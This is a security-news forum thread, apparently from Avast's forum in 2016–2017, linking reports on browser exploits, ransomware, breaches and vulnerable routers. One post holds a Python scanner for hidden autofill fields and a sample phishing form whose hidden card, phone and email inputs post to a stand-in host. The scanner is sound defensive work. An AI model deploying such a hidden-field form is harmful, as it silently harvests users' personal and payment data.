Everybody knows that to be really secure using tor, one should not enable javascript in the tor-browser.
Whenever your privacy is on the line, the situation we live in today means not to go online or risk losing your anon/privacy.
Also I would rather see uMatrix come to tor than noscript of older tor-firefox browser versions used as tor-fork (5 versions behind?!?)
Idiotic that tor-users work with tor built on a firefox 45 version. Absurd.
Wonder whether normal firefox is also affected by this exploit in the on-going battle between end-users
versus governmental, commercial and cybercriminal surveillance-snoopers.
polonus
-
More Than 1 Million Google Accounts Breached by Gooligan
http://blog.checkpoint.com/2016/11/30/1-million-google-accounts-breached-gooligan
As for the Firefox issue, it seems to affect all versions.
-
<snip>
As for the Firefox issue, it seems to affect all versions.
All versions that are actually using TOR that is.
-
Hi DavidR & Eddy,
Regular firefox and the tor browser have been updated to patch that hole.
Tor browser goes to version 6.0.7 and Firefox to version 50.0.2.
More info on Tor can be had here: https://blog.torproject.org/blog/tor-browser-607-released
polonus
-
Hi DavidR & Eddy,
Regular firefox and the tor browser have been updated to patch that hole.
Tor browser goes to version 6.0.7 and Firefox to version 50.0.2.
More info on Tor can be had here: https://blog.torproject.org/blog/tor-browser-607-released
polonus
Yes, just updating to 50.0.2 now.
-
Firefox SVG Animation Remote Code Execution (FF/FF ESR/TB)
https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/
-
Tech support scammers up their game with ransomware (UPDATED)
https://blog.malwarebytes.com/threat-analysis/2016/11/tech-support-scammers-up-their-game-with-ransomware/
https://www.neowin.net/news/ransomware-connects-victims-to-fake-microsoft-technicians-to-have-their-files-decrypted
-
6700 webshops infested with Magento mage.jpg malware:
https://gwillem.gitlab.io/2016/12/01/visbot-malware-on-6691-stores-analysis/
Re: http://www.snapfast.com/blog/magento-mage-jpg-hack/
Infested webshops use Magento and have not installed a vital security update: https://www.security.nl/posting/448375/Magento%3A+gehackte+websites+hebben+update+niet+ge%C3%AFnstalleerd
More on visbot: https://www.bleepingcomputer.com/news/security/visbot-malware-found-on-6-691-magento-online-stores/
A credit card with a rotating CVV code seems the best protection scheme against such hard-to-detect malware.
High time for high tech cards to be rolled out.
polonus
P.S. Magento shop owners can scan here: https://www.magereport.com/
(info credits go out to Willem de Groot)
-
Here the latest Willem de Groot list of compromised shops:
https://sritest.io/#report/a35c19be-bb83-4af9-b57a-2c2ef0936d17
-> https://gwillem.gitlab.io/ -> https://gitlab.com/gwillem/public-snippets/snippets/28813
polonus
-
Sh... IoT just got real: Mirai botnet attacks targeting multiple ISPs
http://www.theregister.co.uk/2016/12/02/broadband_mirai_takedown_analysis/
Shamoon malware returns to again wipe Saudi-owned computers
http://www.theregister.co.uk/2016/12/02/accused_iranian_disk_wiper_returns_to_destroy_saudi_orgs_agencies/
-
Avast Releases Four Free Ransomware Decryptors
https://blog.avast.com/avast-releases-four-free-ransomware-decryptors
-
Google's Invisible CAPTCHA coming to a site near you!
https://www.google.com/recaptcha/intro/comingsoon/invisible.html
More security through obscurity or meant as an advanced surveillance threat for the anonymous tor-user?
Hiding the captcha vault in plain sight, how long will it last before they have to think of something new?
polonus
-
Google's Invisible CAPTCHA coming to a site near you!
https://www.google.com/recaptcha/intro/comingsoon/invisible.html
More security through obscurity or meant as an advanced surveillance threat for the anonymous tor-user?
Hiding the captcha vault in plain sight, how long will it last before they have to think of something new?
polonus
Is there something wrong with making it easier for the average user while making it harder on the bad guys ???
-
Not all users of the Tor Browser are bad guys; there are some very legit reasons to be using Tor
(foreign journalists use it, you may use it when you do not want your insurance company to know about your searches,
which would set your hospital bills unreasonably high).
Today the mere fact that people use Tor makes them suspected of doing something bad. Today one is often guilty until one has proven oneself innocent. A strange Napoleonic interpretation of the law, where one was innocent until proven guilty (tax laws excepted).
Funny is that it is always the not so bright Tor user that gets caught. The ones that do not follow the no-JavaScript rule, that use extensions which make them stand out through their browser fingerprint. So the not so bright baddies are caught, and rightfully so.
You always should use Tor within the framework of the law. I do not use it, but if I did, it would be only as a law-abiding citizen and for legit reasons.
But I can imagine situations where people want some extra anonymity with Tor.
polonus
-
New Ransomware Families to Rise 25% in 2017
http://www.infosecurity-magazine.com/news/new-ransomware-families-to-rise-25/
-
GoldenEye Ransomware - possible Petya follow-up
http://sensorstechforum.com/fr/remove-goldeneye-ransomware-virus-decrypt-encrypted-hard-disks/
-
IoT dolls spy on children or feed them with ad messages:
http://www.forbrukerradet.no/siste-nytt/connected-toys-violate-consumer-laws
You do not want to have your children being exposed to this,
and these invaders of your child's privacy should at least be punished for turning children into products.
What kind of parents allow their children to have such toys?
polonus
-
Dailymotion admits hack exposed millions of accounts
http://www.zdnet.com/article/dailymotion-hack-exposes-millions-of-accounts/
-
Dailymotion admits hack exposed millions of accounts
http://www.zdnet.com/article/dailymotion-hack-exposes-millions-of-accounts/
The only time that these companies are going to take responsibility for securing their systems (and customer data), is when they start getting heavy fines/punitive damages.
Currently there is no incentive for them to spend money securing their systems.
-
Seems a rather serious hole and it hasn't been patched until now:
http://www.zdnet.com/article/two-netgear-routers-are-vulnerable-to-trivial-to-remote-hack/
Users are advised not to use the mentioned NETGEAR routers.
polonus
-
Netgear has had a great many security problems lately.
Here is another example of it.
http://kb.netgear.com/28393/NETGEAR-Product-Vulnerability-Advisory-ReadySHARE
-
Yep, it is all a question of money they do not wanna spend on it,
and we mean moral bankruptcy of firmware here,
that is why there are so many hacks and IoT malbots around.
The situation is not gonna change soon and we have to fend for ourselves, dear Eddy.
Changing the software to XWRT-Vortex seems to mitigate the problem (info credits: @tigs):
Asuswrt-Merlin (or XWRT or Cross-WRT) firmware for the Netgear R7000 router.
At this point you have a working version based on Asuswrt-Merlin v380.63_2
that does not require flashing the custom CFE. The firmware is pretty stable.
Download links:
XWRT for Netgear R7000 v380.63_2 is here
(previous versions are also available at this link)
Official site, Changelog. -> http://www.kb.cert.org/vuls/id/582384
The recommended procedure for initial flashing:
1. Reset your router to factory defaults via the web interface.
2. Flash the R7000_xxx.xx_x.chk file via the web interface.
3. Do another factory reset via the new web interface.
4. Configure everything else.
Procedure for upgrade:
1. Reboot your router via the web interface or power cycle.
2. Flash the R7000_xxx.xx_x.trx file via the web interface.
3. Check new options and configure everything else.
Link to the "back to stock" firmware (v1.0.3.80_1.1.38) is here.
Important: If you want to go away from XWRT back to Tomato or DD-WRT,
you MUST first flash the "back to stock" firmware image, or you will brick your router. :P
polonus
-
We live in times of large-scale automated threats for the default-firmware world.
The next issue coming towards a router near you might be NAS-sing:
Read: https://wrgms.com/synologys-secret-telnet-password/
polonus
-
More on the Netgear routers
CERT > Multiple Netgear routers are vulnerable to arbitrary command injection >> https://www.kb.cert.org/vuls/id/582384
https://www.neowin.net/news/cert-advises-users-to-discontinue-use-of-two-netgear-routers-due-to-major-security-flaw
-
A temp fix: http://www.sj-vs.net/a-temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/
Other Netgear routers that may be vulnerable: Netgear R6400 (also known as AC1750 Smart WiFi Router)
R7500 (Nighthawk X4 AC 2350)
R7800 (Nighthawk X4S Smart WiFi Gaming Router)
R8500 (Nighthawk X8 Tri-Nand WiFi Router)
R8000 (Nighthawk AC3200)
R9000 (Nighthawk AC7200 X10 Smart WiFi Router)
And the ever-popular R7000 & R7000P (Nighthawk AC1900)
pol
-
August: A Spy Trojan for All Seasons
http://www.infosecurity-magazine.com/news/august-a-spy-trojan-for-all-seasons/
84% of Phishing Sites Last for Less Than 24 Hours
http://www.infosecurity-magazine.com/news/84-of-phishing-sites-last-for-less/
KFC warns 1.2 million Colonel's Club loyalty scheme members of data breach after website hacked
http://www.mirror.co.uk/news/uk-news/kfc-warns-12-million-colonels-9426835
-
Security vulnerabilities fixed in Firefox ESR 45.6
https://www.mozilla.org/en-US/security/advisories/mfsa2016-95/
-
Half of World’s Top Websites are Vulnerable to Attack
http://www.infosecurity-magazine.com/news/half-of-worlds-top-websites-are/
-
Microsoft Security Bulletin Summary for December 2016
https://technet.microsoft.com/library/security/ms16-dec
-
Vital update for Joomla hole: https://developer.joomla.org/security-centre/664-20161201-core-elevated-privileges.html
Update: https://www.joomla.org/announcements/release-news/5693-joomla-3-6-5-released.html
polonus
-
Yahoo discloses hack of 1 billion accounts
https://techcrunch.com/2016/12/14/yahoo-discloses-hack-of-1-billion-accounts/
Affected users will be required to change their passwords, but they do not force people to change them.
-
Yahoo discloses hack of 1 billion accounts
https://techcrunch.com/2016/12/14/yahoo-discloses-hack-of-1-billion-accounts/
Affected users will be required to change their passwords, but they do not force people to change them.
It is amazing that this actually goes back as far as 2013 and is only being reported now. I do recall another article reporting this some time ago and getting advised to change password, etc.
-
Hi Eddy,
Some at Yahoo knew about that 3 years ago.
1. Data-breaches and data-leaks will continue, because software will always have bugs.
2. Normally functioning devices will always get into the hands of people
that have very little knowledge of how to use them properly.
3. Making things upgradable hinders standardisation.
4. IPv4 and IPv6 can be spoofed much too easily.
5. Abuse of infrastructure will continue by guys that abuse for money or for political ends.
6. Experts that can make a difference do not wanna discuss things.
7. Conclusion: This is why we stay where we are, that is at the same ever so high threat level.
Damian
-
The Follow up on Yahoo discloses hack of 1 billion accounts
https://www.bloomberg.com/news/articles/2016-12-15/stolen-yahoo-data-includes-government-employee-information
DavidR,
there was another hack in 2014 where data of +/- 500 million people were stolen and it was disclosed in September this year.
This is a hack that took place in August 2013 and only was discovered last month because the hackers offered the list online.
It sure makes you wonder about the security (department) at Yahoo.
-
It sure makes you wonder about the security (department) at Yahoo.
Shocking, indeed. :o
More here: https://investor.yahoo.net/releasedetail.cfm?ReleaseID=1004285
-
<snip>
DavidR,
there was another hack in 2014 where data of +/- 500 million people were stolen and it was disclosed in September this year.
This is a hack that took place in August 2013 and only was discovered last month because the hackers offered the list online.
It sure makes you wonder about the security (department) at Yahoo.
I have seen that some considerable time ago also.
In all honesty, any company that says it hasn't been hacked is either naive, not telling (scared of the financial consequences) or they haven't been probed yet (small beer).
There is yet another young UK Autistic man fighting extradition to the UK having hacked many different US Government systems, all from his back bedroom. If it is that easy they shouldn't be extraditing people like this by employing them to shore up their lack of security.
-
This massive hack of Yahoo is certainly good news for Verizon.
Wonder if there's any correlation ??? ( No, I'm not really that cynical.... :) )
-
Hi bob3160,
In Europe we had that old saying "the one's death means the other's daily bread".
Sometimes reality in the world is that cynical; it is called "dead" real. ;D
Another subject. How does avast protect its users against the new FinFisher malware,
like the malcoded Word, Adobe Flash Player and WinRAR zero-day attacks from two government hacking groups
that MS dubbed 'Promethium' & 'Neodymium'?
Users in the Netherlands, Belgium, Turkey and Germany were attacked, but also users in the UK and the U.S. of A.
It seems a cocktail of Wingbird malware with some commercial spyware/phishware topping.
Good mail protection seems vitally important.
An example of such malware is described here:
https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/
It is not only malware and other abuse you have to evade but now also being hacked by your own
or other friendly or unfriendly governments.
Not good for lawful and abiding citizens, they just feel like the people in the lawless town of the comics,
waiting for Lucky Luke to return.
polonus
-
(http://screencast-o-matic.com/screenshots/u/Lh/1481912769559-16617.png)
Click here for details: http://www.computerworld.com/article/3151012/security/evernote-backs-off-from-privacy-policy-changes-says-it-messed-up.html
-
Hi bob3160,
Certainly they will back off as it will cost them dearly in customers
whenever they would continue on that road.
When the "cat is up in the curtains", so to say, you'd better have an improved secondary plan.
But I think all of these services are similar - OneNote, Evernote, Google's etc.
Do not share with them in the cloud, what you'd not like to share with others anyway.
It is your own repeated warning, bob3160 and it is a hard truth and 100%.
But the worst thing is that it did not teach IT staff around the world
not to save their account and password information in the Evernote cloud.
With all the hacking and security and data-breaches going around,
you soon could be an innocent victim and when your info is on the loose
you'd never know where it lands in the wide, wild, web world
and it may never come around forever and a day..... ;D
your avast forum-friend,
Damian
-
Chrome’s Adblock Pro is a uBlock Origin rip-off
http://www.ghacks.net/2016/12/18/chromes-adblock-pro-is-a-ublock-origin-rip-off/
-
Chrome’s Adblock Pro is a uBlock Origin rip-off
http://www.ghacks.net/2016/12/18/chromes-adblock-pro-is-a-ublock-origin-rip-off/
sounds like another iobit malwarebytes fiasco
-
Hi bob3160,
If true, this is another example of where users' trust comes flying out of the window with a form of blatant code theft.
Just like the secret scandal with selling the WoT tool user base data. Swindlers everywhere and no one who calls it to a halt.
We are in need of another continent, like Australia once was, where we can send all these fraudsters and swindlers.
Making money from other persons' brains and code. It is a shame really. They aren't ashamed of anything anymore,
an online Sodom and Gomorrah of abuse.
polonus
P.S. Also important scroll down to mem consumption differences between ABP & uBlock origin:
https://github.com/gorhill/uBlock#memory
-
‘Yahoo is not safe to use,’ former company engineer says
https://www.the-parallax.com/2016/12/16/yahoo-not-safe-former-engineer-says/
How to dump your Yahoo, Flickr, and Tumblr accounts
https://www.the-parallax.com/2016/10/12/dump-yahoo-flickr-tumblr-accounts/
-
Amsterdam Data Centre into very big ad-fraud: http://www.whiteops.com/methbot
polonus
-
Looks like PC Matic and Malwarebytes are locked in a battle.
Malwarebytes is tagging PC Matic as a PUP and PC Matic is retaliating by blocking Malwarebytes.
Apparently Malwarebytes is refusing to talk to PC Matic and vice versa.
To me, it looks like mutual exclusions should work. Since I don't use PC Matic, I can't guarantee that however.
http://greenarrow.pcpitstopmail.com/ss/link.php?N=21315&L=3824&S=QjZjNTM&E=cXZ4xWZyBUYylWZz1WYyRnLj9Wb&H=LgDNbrd3
https://forums.pcpitstop.com/index.php?/topic/206255-pc-matic-and-malwarebytes-pup-flags/?view=findpost&p=1808872&hl=pcmatic
-
Facebook flaw mitigated: http://www.dawgyg.com/2016/12/21/disclosing-the-primary-email-address-for-each-facebook-user/
polonus
-
Looks like PC Matic and Malwarebytes are locked in a battle.
Malwarebytes is tagging PC Matic as a PUP and PC Matic is retaliating by blocking Malwarebytes.
Apparently Malwarebytes is refusing to talk to PC Matic and vice versa.
To me, it looks like mutual exclusions should work. Since I don't use PC Matic, I can't guarantee that however.
http://greenarrow.pcpitstopmail.com/ss/link.php?N=21315&L=3824&S=QjZjNTM&E=cXZ4xWZyBUYylWZz1WYyRnLj9Wb&H=LgDNbrd3
https://forums.pcpitstop.com/index.php?/topic/206255-pc-matic-and-malwarebytes-pup-flags/?view=findpost&p=1808872&hl=pcmatic
That's actually quite a non-professional way of dealing with the issue from MBAM, since they didn't respond to pcpitstop when asked. I really like their products. But locking horns seems just a distraction from the real fight against malware and ransomware. They are even blocking the Auslogics cleaner.
Update: at least they explained it:
https://blog.malwarebytes.com/puppum/2016/12/why-malwarebytes-detects-pc-pitstop-as-potentially-unwanted/
-
VMware Security Advisories - VMSA-2016-0024
https://www.vmware.com/security/advisories/VMSA-2016-0024.html
-
A Malware Cocktail Shakes Up Cerber Ransomware Infections
http://www.infosecurity-magazine.com/news/a-malware-cocktail-shakes-up/
-
Alice: A Lightweight, Compact, No-Nonsense ATM Malware
http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/
-
Alice: A Lightweight, Compact, No-Nonsense ATM Malware
http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/
Now here I thought you were talking about my wife Alice and all the ATM withdrawals she's been making lately ???
-
hmmm, maybe this need further investigation ;D
-
Service worker JavaScript code changes bringing more extensive Google snoopin' to your Chrome/newtab?
Read on these recent changes: https://www.reddit.com/r/javascript/comments/3n4cyz/suspicious_service_worker_in_chrome/
Why would they do that?
Maybe we have to consider this also in the light of having to hand over your Google account credentials before entering the USA,
this is the public side of it now: http://www.politico.com/story/2016/12/foreign-travelers-social-media-232930
Soon they also will perform such checks at this side of the Atlantic too, for instance at Amsterdam Schiphol airport in the Netherlands, will be handled by American officials.
Being on social media is not that innocent, folks.
Mind the spooks....
polonus
-
New DeriaLock Ransomware Active on Christmas, Includes An 'Unlock All' Command
https://www.bleepingcomputer.com/news/security/new-derialock-ransomware-active-on-christmas-includes-an-unlock-all-command/
Hope avast is ready...... ;)
-
Protection against malicious Word macros using Windows Firewall:
https://limpidwebblog.blogspot.com/2016/10/a-shower-leads-to-powershell-puking.html
PowerShell will shortly come to Windows 10 as the command prompt interpreter.
A bash shell in beta has also arrived:
http://www.howtogeek.com/249966/how-to-install-and-use-the-linux-bash-shell-on-windows-10/
Having been around for years and offering far more is Cygwin, with editors, compilers, database clients, etc. You could even choose to install the X server to get an X Window graphical user interface. In this way you can run graphical Linux programs: https://www.cygwin.com
All for the advanced user, but others may try as well.
polonus
-
Millions of Websites Vulnerable Due to Security Bug in Popular PHP Script
https://www.bleepingcomputer.com/news/security/millions-of-websites-vulnerable-due-to-security-bug-in-popular-php-script/
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
-
Hi, Pondus beat me to it by a sec ;)
N.B. Big zero-day hole in WordPress PHPMailer: https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
Critical Vulnerability in PHPMailer. Affects WP Core [1]
Millions and millions of websites vulnerable.
A critical remote code execution vulnerability in PHPMailer has been discovered by Polish researcher Dawid Golunski. The vulnerability was announced on legalhackers.com yesterday but proof of concept exploit details were not included.
Unfortunately someone posted a proof of concept to exploit-db and to github a few hours ago demonstrating how the vulnerability can be exploited in the PHPMailer library, but not targeting any web application that is in use.
We are publishing this unscheduled update to give PHP developers and our community advance warning of this issue. We expect this story to continue to evolve rapidly as more developers and malicious actors look at this code.
An issue in WP core was opened about 4 hours ago that included a patch to fix this issue. It updates WP core from using PHPMailer 5.2.14 to 5.2.19. This is just a proposed patch, not the final fix.
polonus
-
Evolved DNSChanger malware slings evil ads at PCs, hijacks routers
Software nasty is packed with exploits for vulnerabilities in home broadband boxes
http://www.theregister.co.uk/2016/12/20/new_dnschanger_exploit_kit_goes_after_166_types_of_router/
-
Update...
Since an hour there is a patched update for WP core: https://github.com/PHPMailer/PHPMailer/blob/master/class.phpmailer.php
All are asked to update to version 5.2.19.
polonus
-
KillDisk ransomware demands over $215,000
https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/
-
This man's smart television with Google TV caught some malware, and now it's bricked
http://www.androidpolice.com/2016/12/27/smart-mans-smart-television-google-tv-caught-malware-now-bricked/
-
This man's smart television with Google TV caught some malware, and now it's bricked
http://www.androidpolice.com/2016/12/27/smart-mans-smart-television-google-tv-caught-malware-now-bricked/
What I have been banging on about Smart TV for some time, pigeons coming home to roost.
I'm waiting for the IoT (Internet of Things) coming down with the same hijack/malware issues. Imagine your fridge locking you out or ordering stuff for itself, fridge light, heater and TV.
-
This man's smart television with Google TV caught some malware, and now it's bricked
http://www.androidpolice.com/2016/12/27/smart-mans-smart-television-google-tv-caught-malware-now-bricked/
It has already been un-bricked. :)
(Read the replies.)
-
You would think he would have tried a factory restore as a first step anyway as that would have been a detailed step in the troubleshooting guide at the back of the TV's user manual, the TV would have been fixed in 5 minutes :)
-
FTC Seeks Tools for Securing Home IoT Devices
http://www.securityweek.com/ftc-seeks-tools-securing-home-iot-devices
Submissions will be evaluated by a panel of five judges.
The top prize is $25,000, but the FTC is also prepared to reward three other competitors with up to $3,000.
-
A quarter of Dutch hospitals do not secure their websites sufficiently, according to the Dutch WICS (Women in Cybersecurity). 25 hospitals did not even use secure connections; others were vulnerable to potential patient data breaches, etc.
Dutch news link: http://www.trouw.nl/tr/nl/39683/nbsp/article/detail/4444509/2017/01/06/Ziekenhuizen-beveiligen-sites-niet-goed.dhtml (use Google Translate)
If management income has first priority and security comes as a last resort issue, we get into the situation we have at hand now.
polonus
-
Koolova ransomware decrypts your files for free if you read two security articles
https://www.neowin.net/news/koolova-ransomware-decrypts-your-files-for-free-if-you-read-two-security-articles
http://thehackernews.com/2017/01/decrypt-ransomware-files.html
-
Interesting virtual attack map for ye all: http://map.norsecorp.com/#/
pol
-
Unsecure routers, webcams prompt feds to sue D-Link
http://arstechnica.com/tech-policy/2017/01/unsecure-routers-webcams-prompt-feds-to-sue-d-link/?comments=1
-
Interesting virtual attack map for ye all: http://map.norsecorp.com/#/
pol
http://map.ipviking.com/ >> seems to be down or maintenance
http://cybermap.kaspersky.com/
http://worldmap3.f-secure.com/
http://threatmap.fortiguard.com/
https://blog.opendns.com/global-network/
http://dds.ec/pewpew/index.html
https://www.fireeye.com/cyber-map/threat-map.html
http://www.digitalattackmap.com/
https://threatmap.checkpoint.com/ThreatPortal/livemap.html
http://www.trendmicro.com/us/security-intelligence/current-threat-activity/global-botnet-map/index.html
-
Norton Core router >> https://norton.com/core
https://www.cnet.com/products/norton-core/preview/
http://www.trustedreviews.com/news/norton-core-secure-router-for-smart-home-devices
There are already similar products from Bitdefender / F-Secure / ASUS-TrendMicro.
Should avast do the same?
-
Top Ten Hosting/ISP's infested with Brobot: https://www.dosarrest.com/ddos-blog/top-ten-hosting-isp-s-with-servers-infected-by-brobot/
And a scan for a site not responsive: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.urlencoded.com%2Ftrack.php
error found JavaScript
error: line:3: SyntaxError: missing = in XML attribute:
error: line:3: <!DOCTYPE HTML PUBLIC "-/W3C/DTD HTML 4.01/EN" "http:/www.w3.org/TR/html4/strict.dtd">
error: line:3: ...............^
related to offline transactions....
polonus
-
New Scheme: Spread Popcorn Time Ransomware, get chance of free Decryption Key
https://www.bleepingcomputer.com/news/security/new-scheme-spread-popcorn-time-ransomware-get-chance-of-free-decryption-key/
With Popcorn Time, not only can a victim pay a ransom to get their files back, but they can also try to infect two other people and have them pay the ransom in order to get a free key.
-
Spoofed Microsoft Security Office – Urgent Info Regarding Your Bank Assets delivers unknown malware
https://myonlinesecurity.co.uk/spoofed-microsoft-security-office-urgent-info-regarding-your-bank-assets-delivers-unknown-malware/
-
From Darknet with Love: Meet Spora Ransomware
http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/
Hope avast+AVG are protected from Spora and other ransomware families. :D
-
From Darknet with Love: Meet Spora Ransomware
http://blog.emsisoft.com/2017/01/10/from-darknet-with-love-meet-spora-ransomware/
Hope avast+AVG are protected from Spora and other ransomware families. :D
Spora Ransomware Works Offline, Has the Most Sophisticated Payment Site as of Yet
https://www.bleepingcomputer.com/news/security/spora-ransomware-works-offline-has-the-most-sophisticated-payment-site-as-of-yet/
https://virustotal.com/nb/file/1250f821898d7cfe9ef323801b283529668c59c064408920002710a4ce042356/analysis/
https://virustotal.com/nb/file/dbfd24cd70f02ddea6de0a851c1ef0f45f18b4f70e6f3d0f2e2aec0d1b4a2cbf/analysis/
-
Microsoft Security Bulletin Summary for January 2017
https://technet.microsoft.com/library/security/ms17-jan.aspx
-
Marlboro new Ransomware! Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA
-
Marlboro new Ransomware! Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA
It's a pity that we don't have more info about the infector (MD5, etc.).
There is not an explicit VirusTotal link either.
-
Marlboro new Ransomware! Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA
It's a pity that we don't have more info about the infector (MD5, etc.).
There is not an explicit VirusTotal link either.
https://www.virustotal.com/en/file/a95d7606d17b221bca0960d04bffdc5ff1585ca13a2511bbf5347a732a3a025c/analysis/
WE ARE PROTECTED!!!
-
Wow! Thanks Be Secure 8)
-
Marlboro new Ransomware! Demonstration of attack video review.
Avast and AVG are clueless.
https://youtu.be/Qg-2h8szsGA
It's a pity that we don't have more info about the infector (MD5, etc.).
There is not an explicit VirusTotal link either.
There is something called google search ;) then you find articles and stuff with MD5
Like this and many more
https://www.bleepingcomputer.com/news/security/marlboro-ransomware-defeated-in-one-day/
-
Confirmed: WhatsApp backdoored for snoopers: https://www.theguardian.com/technology/2017/jan/13/whatsapp-backdoor-allows-snooping-on-encrypted-messages
With cross-device tracking and tracking via keystroke-dynamics you'd better put some duct-tape over that device camera.
I want an opt-out for this and not constantly being requested to opt-in to be part of this global surveillance party.
I wanna decide when to close the curtains or turn down the lights, you social media snoopers, even when I have nothing to hide.
polonus
P.S. Good I have my apps locking from Avast Mobile Security.
-
Genealogy Caution:
(http://screencast-o-matic.com/screenshots/u/Lh/1484401895905-19238.png)
https://www.washingtonpost.com/news/the-intersect/wp/2017/01/12/youve-probably-never-heard-of-this-creepy-genealogy-site-but-its-heard-all-about-you/
-
You might reconsider buying that 6th or 7th generation “U” processor computer.
http://www.digitaltrends.com/computing/intel-kaby-lake-skylake-pcs-hackable-usb-jtag/
-
You might reconsider buying that 6th or 7th generation “U” processor computer.
http://www.digitaltrends.com/computing/intel-kaby-lake-skylake-pcs-hackable-usb-jtag/
I think it's a bit late considering 6th generation "U" processors have been out for a very long time. The 7th generation "U" processors have been out for a short time; I have actually got one.
From my reading of this article, don't they have to have physical access to your system to plug into the USB 3 port. If so that is the least of your problems as they can do anything, essentially they own the system.
-
...If so that is the least of your problems as they can do anything, essentially they own the system.
There seems to be a contradiction in the quoted sentence. Did you mean to say it's the least of your problems since they can only do harm if they have physical access to your computer which they presumably won't have?
-
...If so that is the least of your problems as they can do anything, essentially they own the system.
There seems to be a contradiction in the quoted sentence. Did you mean to say it's the least of your problems since they can only do harm if they have physical access to your computer which they presumably won't have?
You quote a sentence in isolation, which is part of that paragraph and takes it out of context.
From my reading of this article, don't they have to have physical access to your system to plug into the USB 3 port. If so that is the least of your problems as they can do anything, essentially they own the system.
-
You quote a sentence in isolation, which is part of that paragraph and takes it out of context.
As part of the whole context it's also a contradiction.
What is the least of your problems? The fact that they can do anything, or the fact that they need physical access (in which case they do nothing)?
-
Please help me!! I ask for your help! Avast Free some background service periodically turned off !!! It has had a warning window: avast a service program to switch off! But the program did not identify. What could be the problem, because today about 10-15 minutes Peda something in the background, turn off the background and service: You are defenseless! I get a message down to three service reset. self-defense module does not work ??? ??? ??? :( >:(
-
Please help me!! I ask for your help! Avast Free some background service periodically turned off !!! It has had a warning window: avast a service program to switch off! But the program did not identify. What could be the problem, because today about 10-15 minutes Peda something in the background, turn off the background and service: You are defenseless! I get a message down to three service reset. self-defense module does not work ??? ??? ??? :( >:(
Repair Avast:
Control Panel> Program and Features (Add/remove program)>Select Avast> Select Repair. Reboot when completed
https://www.avast.com/faq.php?article=AVKB204
If Repair doesn't fix the problem, try the following:
Clean Install of Avast:
https://goo.gl/4Ptzkf
If this doesn't solve your problem, please start your own topic.
-
You quote a sentence in isolation, which is part of that paragraph and takes it out of context.
As part of the whole context it's also a contradiction.
What is the least of your problems? The fact that they can do anything, or the fact that they need physical access (in which case they do nothing)?
It is clearly obvious: if they have access to your system you're stuffed, so that exploit is secondary to the damage/theft, etc. etc.; they can do what they like. As I said, "essentially they own the system."
-
It is clearly obvious: if they have access to your system you're stuffed, so that exploit is secondary to the damage/theft, etc. etc.; they can do what they like. As I said, "essentially they own the system."
Some readers didn't find the way you originally wrote it so obvious.
Anyway, the bottom line is that if baddies gain access to someone's computer they can do anything with it, so this is a secondary concern. This has also been confirmed by Intel:
http://www.digitaltrends.com/computing/intel-kaby-lake-skylake-pcs-hackable-usb-jtag/
-
Make sure your browser isn't filling in hidden auto-fill fields:
http://www.digitaltrends.com/computing/browser-bug-can-fill-in-personal-information-in-hidden-fields/
http://www.zdnet.com/article/new-phishing-attack-steals-personal-data-through-browser-autofill/
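The trick described in the two articles above is that a form shows one harmless field while other inputs carrying autocomplete hints are hidden with CSS or pushed off-screen, and the browser's autofill silently completes all of them. As an added example (not code from either article), this scanner flags such inputs in a form; the sample form, the autocomplete token list and the hiding heuristics are my own constructions:

```python
"""Added example: audit an HTML form for autofill-targeted inputs that are
hidden from the user. Uses only the standard library so it runs offline.
"""
from html.parser import HTMLParser
import re

# Autocomplete tokens a hidden-field phishing form most often harvests
# (assumed list; extend to taste).
SENSITIVE_AUTOCOMPLETE = {
    "email", "tel", "street-address", "address-line1", "address-line2",
    "postal-code", "cc-number", "cc-exp", "cc-csc", "organization",
}

# Inline-style patterns that make an input invisible or off-screen.
_HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{3,}px",
    re.I,
)


def _is_hidden(attrs):
    """True if the input is hidden by attribute, type or inline style."""
    if "hidden" in attrs:
        return True
    if attrs.get("type", "").lower() == "hidden":
        return True
    return bool(_HIDDEN_STYLE.search(attrs.get("style", "")))


class _AutofillAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "input":            # html.parser already lower-cases tags
            return
        a = {k: (v or "") for k, v in attrs}   # bare attrs (e.g. hidden) -> ""
        hint = a.get("autocomplete", "").strip().lower()
        if hint in SENSITIVE_AUTOCOMPLETE and _is_hidden(a):
            self.findings.append((a.get("name") or hint, hint))


def hidden_autofill_fields(html):
    """Return [(field name, autocomplete token)] for hidden sensitive inputs."""
    parser = _AutofillAudit()
    parser.feed(html)
    return parser.findings


# Constructed sample mimicking the trick: one visible field, three hidden ones.
SAMPLE_FORM = """
<form action="https://example.invalid/collect" method="post">
  <input name="name" autocomplete="name" placeholder="Your name">
  <input name="email" autocomplete="email" style="position:absolute; left:-5000px">
  <input name="phone" autocomplete="tel" style="display:none">
  <input name="cc" autocomplete="cc-number" hidden>
  <input name="company" autocomplete="organization">
  <button type="submit">Send</button>
</form>
"""

if __name__ == "__main__":
    for name, hint in hidden_autofill_fields(SAMPLE_FORM):
        print(f"hidden autofill field: {name} ({hint})")
```

Heuristics like these only catch inline styles; a real check in a browser extension would ask the rendered layout (bounding box, computed style) rather than the markup.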
-
Locky Ransomware Activity Goes Down by 81%
https://www.bleepingcomputer.com/news/security/locky-ransomware-activity-goes-down-by-81-percent/
-
Wide Impact: Highly Effective Gmail Phishing Technique Being Exploited
